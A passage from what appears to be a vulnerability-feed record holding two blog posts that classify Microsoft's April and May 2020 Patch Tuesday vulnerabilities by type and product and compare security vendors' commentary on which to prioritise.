[CVE-2020-1005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1005>))\n * Windows GDI ([CVE-2020-0952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0952>))\n * Windows Push Notification Service ([CVE-2020-1016](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1016>))\n\n#### ![](http://www.avleonov.com/vulnicons/xss.png)Cross Site Scripting\n\n * Microsoft Dynamics 365 (On-Premise) ([CVE-2020-1049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1049>), [CVE-2020-1050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1050>))\n\nZero Day Initiative recommends to note Denial-of-Service in the Windows DNS service (CVE-2020-0993). "Considering the damage that could be done by an unauthenticated attacker". At the same time Microsoft website says: "To exploit the vulnerability, an **authenticated** attacker could send malicious DNS queries to a target, resulting in a denial of service". It seems like a mistake on ZDI or MS, but worth mentioning.\n\n## Updates for older vulners\n\nSo, that's it for April Patch Tuesday. What about the interesting vulnerabilities from February and March?\n\n 1. CVE-2020-0796 - Windows SMBv3 Client/Server Remote Code Execution Vulnerability. New exploit now available for this vulnerability, it's even in Metasplot. But it's not the one you have probably waited for. It does not attack remote hosts, it's [a local exploit for "(hopefully privileged) payload execution"](<https://vulners.com/metasploit/MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2020_0796_SMBGHOST>). \n**upd.** While I was working on this post I missed the news about CVE-2020-0796 RCE POC by Ricerca Security. The code is not available, here is [technical description](<https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html>) and [video](<https://vimeo.com/409855578>).\n 2. CVE-2020-0688 - Microsoft Exchange server "single e-mail" seizure. Exploit exists. Rapid7 made a [nice report](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>) "What we found was that **at least** 357,629 (82.5%) of the 433,464 Exchange servers we observed were known to be vulnerable."\n 3. CVE-2020-0684 - .LNK files processing. Nothing new.\n 4. CVE-2020-0662 - Mysterious Windows RCE. Nothing new.\n![](http://feeds.feedburner.com/~r/avleonov/~4/0BOlzDUoVDc)", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-26T01:24:38", "type": "avleonov", "title": "Microsoft Patch Tuesday April 2020: my classification script, confusing RCE in Adobe Type Manager and updates for older vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0662", "CVE-2020-0684", "CVE-2020-0687", "CVE-2020-0688", "CVE-2020-0699", "CVE-2020-0760", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0796", "CVE-2020-0821", "CVE-2020-0835", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0899", "CVE-2020-0900", "CVE-2020-0906", "CVE-2020-0907", "CVE-2020-0910", "CVE-2020-0913", "CVE-2020-0917", "CVE-2020-0918", "CVE-2020-0919", "CVE-2020-0920", "CVE-2020-0923", "CVE-2020-0924", "CVE-2020-0925", "CVE-2020-0926", "CVE-2020-0927", "CVE-2020-0929", "CVE-2020-0930", "CVE-2020-0931", "CVE-2020-0932", "CVE-2020-0933", "CVE-2020-0934", "CVE-2020-0935", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0939", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0943", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0947", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0954", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0961", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0971", "CVE-2020-0972", "CVE-2020-0973", "CVE-2020-0974", "CVE-2020-0975", "CVE-2020-0976", "CVE-2020-0977", "CVE-2020-0978", "CVE-2020-0979", "CVE-2020-0980", "CVE-2020-0981", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0984", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0991", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1002", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1018", "CVE-2020-1019", "CVE-2020-1020", "CVE-2020-1022", "CVE-2020-1026", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1049", "CVE-2020-1050", "CVE-2020-1094"], "modified": "2020-04-26T01:24:38", "id": "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "href": "http://feedproxy.google.com/~r/avleonov/~3/0BOlzDUoVDc/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-20T04:20:58", "description": "This will be my third Microsoft Patch Tuesday report in video and audio format. And for the third time in a row, Microsoft has addressed over a hundred vulnerabilities. With my [Microsoft Patch Tuesday parser](<https://avleonov.com/2020/04/26/microsoft-patch-tuesday-april-2020/#classification-script>), it was possible to generate a report almost on the same day. But, of course, it takes much more time to describe the vulnerabilities manually.\n\n![Microsoft Patch Tuesday May 2020](https://avleonov.com/wp-content/uploads/2020/05/Microsoft_Patch_Tuesday_May_2020-1024x576.png)\n\n * All vulnerabilities: 111\n * Critical: 16\n * Important: 95\n * Moderate: 0\n * Low: 0\n\n[Last time](<https://avleonov.com/2020/04/26/microsoft-patch-tuesday-april-2020/>) I complained that different VM vendors release completely different reports for Microsoft Patch Tuesday. This time I decided that it's not a bug, but a feature. I upgraded my script to not only show vulnerabilities, but also show how these vulnerabilities were mentioned in the reports of various VM vendors ([Tenable](<https://www.tenable.com/blog/microsoft-s-may-2020-patch-tuesday-addresses-111-cves>), [Qualys](<https://blog.qualys.com/laws-of-vulnerabilities/2020/05/12/may-2020-patch-tuesday-111-vulns-16-critical-sharepoint-vs-code-adobe-patches>), [Rapid7](<https://blog.rapid7.com/2020/05/12/patch-tuesday-may-2020/>) and [ZDI](<https://www.thezdi.com/blog/2020/5/12/the-may-2020-security-update-review>)). In my opinion, it seems pretty useful.\n\n### Exploitation detected (0)\n\nIn the old report, we can see that there are no vulnerabilities actively used in attacks.\n\n### Exploitation more likely (8)\n\nThere are 8 vulnerabilities that MS considers more likely to be exploited. We see the types of these vulnerabilities and what products they affect. But all other details should be googled.\n\n#### ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution\n\n * Internet Explorer ([CVE-2020-1062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1062>))\n * Microsoft Graphics Components ([CVE-2020-1153](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1153>))\n * VBScript ([CVE-2020-1035](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1035>), [CVE-2020-1058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1058>), [CVE-2020-1060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1060>))\n\n#### ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege\n\n * Windows Graphics Component ([CVE-2020-1135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1135>))\n * Windows Kernel ([CVE-2020-1054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1054>), [CVE-2020-1143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1143>))\n\nAnd here my script adds comments about vulnerabilities from the vendors and highlights vulnerabilities that were mentioned (or not mentioned).\n\n![my script adds comments about vulnerabilities from the vendors\n](https://avleonov.com/wp-content/uploads/2020/05/image-3.png)\n\nWe can see right away that Rapid7 recommends paying attention to RCE in Internet Explorer (CVE-2020-1062), although other vendors ignore this vulnerability.\n\nAccording to W3Counter, the current IE11 share is only 1.75%. But, on the other hand, it can still be used in some organizations to access legacy systems. And so this vulnerability may be exploited in targeted attacks.\n\nTenable pays attention to RCE in Microsoft Graphics Components. "The attacker would need to utilize social engineering tactics to convince a user to open a specially crafted file". Finally, ZDI claims that VBScript RCE (CVE-2020-1060) is especially interesting because "does't involve some form of user interaction".\n\nAgree that looking at Microsoft Patch Tuesday vulnerabilities in this way is much more fun. ![\ud83d\ude42](https://s.w.org/images/core/emoji/13.0.1/72x72/1f642.png)\n\nRegarding the Elevation of Privilege, ZDI claims that Windows Graphics Component EoP (CVE-2020-1135) is a real exploitable thing. Tenable mentions vulnerabilities of this type in Windows Kernel (CVE-2020-1054, CVE-2020-1143).\n\nThese were all "more likely to be exploited" vulnerabilities, according to Microsoft.\n\n### Other Product based (36)\n\nWhat about other vulnerabilities? Let's see the large groups of vulnerabilities in the same product. Strictly speaking, there is only one product, Microsoft SharePoint, with a bunch of different vulnerabilities. The rest are EoPs in Windows components that no VM vendor mentions.\n\n#### Microsoft SharePoint\n\n * ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution ([CVE-2020-1023](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1023>), [CVE-2020-1024](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1024>), [CVE-2020-1102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1102>), [CVE-2020-1069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1069>))\n * ![](http://www.avleonov.com/vulnicons/infdis.png)Information Disclosure ([CVE-2020-1103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1103>))\n * ![](http://www.avleonov.com/vulnicons/xss.png)Cross Site Scripting ([CVE-2020-1099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1099>), [CVE-2020-1100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1100>), [CVE-2020-1101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1101>), [CVE-2020-1106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1106>))\n * ![](http://www.avleonov.com/vulnicons/spoofing.png)Spoofing ([CVE-2020-1104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1104>), [CVE-2020-1105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1105>), [CVE-2020-1107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1107>))\n\n#### Windows Runtime\n\n * ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege ([CVE-2020-1077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1077>), [CVE-2020-1086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1086>), [CVE-2020-1090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1090>), [CVE-2020-1125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1125>), [CVE-2020-1139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1139>), [CVE-2020-1149](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1149>), [CVE-2020-1151](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1151>), [CVE-2020-1155](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1155>), [CVE-2020-1156](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1156>), [CVE-2020-1157](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1157>), [CVE-2020-1158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1158>), [CVE-2020-1164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1164>))\n\n#### Windows State Repository Service\n\n * ![](http://www.avleonov.com/vulnicons/eop.png)Elevation of Privilege ([CVE-2020-1124](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1124>), [CVE-2020-1131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1131>), [CVE-2020-1134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1134>), [CVE-2020-1144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1144>), [CVE-2020-1184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1184>), [CVE-2020-1185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1185>), [CVE-2020-1186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1186>), [CVE-2020-1187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1187>), [CVE-2020-1188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1188>), [CVE-2020-1189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1189>), [CVE-2020-1190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1190>), [CVE-2020-1191](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1191>))\n\nBut they write a lot about SharePoint, especially about RCEs (CVE-2020-1023, CVE-2020-1024, CVE-2020-1069, CVE-2020-1102). Three of the four RCEs involve uploading a malicious application package to exploit the vulnerabilities, while the other involves uploading a malicious page. In short, if you use SharePoint in your organization, you need to patch again.\n\n### Other Vulnerability Type based (67)\n\nAnd what about the remaining vulnerabilities in various products. Of course, the RCEs that can be used in phishing attacks are most interesting. These are vulnerabilities in Microsoft Color Management (CVE-2020-1117), Edge PDF (CVE-2020-1096) and Excel (CVE-2020-0901).\n\nVendors paid a lot of attention to RCEs in Visual Studio Code Python Extension (CVE-2020-1171, CVE-2020-1192). But IMHO this is just a funny case. It is unlikely that attacks that require opening a specially crafted file or a repository with malicious code in Visual Studio Code will be massive.\n\nIt is also worth noting the RCE vulnerability in Windows (CVE-2020-1067). ZDI guys write that: "the only thing keeping this from being Critical is the fact that the attacker needs a domain user account for their specially crafted request to succeed. This makes the bug a prime target for insider threats, as well as penetration testers looking to expand their foothold in a target enterprise."\n\n#### ![](http://www.avleonov.com/vulnicons/rce.png)Remote Code Execution\n\n * Chakra Scripting Engine ([CVE-2020-1037](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1037>), [CVE-2020-1065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1065>))\n * Internet Explorer ([CVE-2020-1092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1092>))\n * Jet Database Engine ([CVE-2020-1051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1051>), [CVE-2020-1174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1174>), [CVE-2020-1175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1175>), [CVE-2020-1176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1176>))\n * MSHTML Engine ([CVE-2020-1064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1064>))\n * Microsoft Color Management ([CVE-2020-1117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1117>))\n * Microsoft Edge PDF ([CVE-2020-1096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1096>))\n * Microsoft Excel ([CVE-2020-0901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0901>))\n * Microsoft Script Runtime ([CVE-2020-1061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1061>))\n * VBScript ([CVE-2020-1093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1093>))\n * Visual Studio Code Python Extension ([CVE-2020-1171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1171>), [CVE-2020-1192](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1192>))\n * Windows ([CVE-2020-1067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1067>))\n\n#### ![](http://www.avleonov.com/vulnicons/dos.png)Denial of Service\n\n * .NET Core & .NET Framework ([CVE-2020-1108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1108>))\n * ASP.NET Core ([CVE-2020-1161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1161>))\n * Connected User Experiences and Telemetry Service ([CVE-2020-1084](<https://portal.msrc.microsoft.com/en-US/security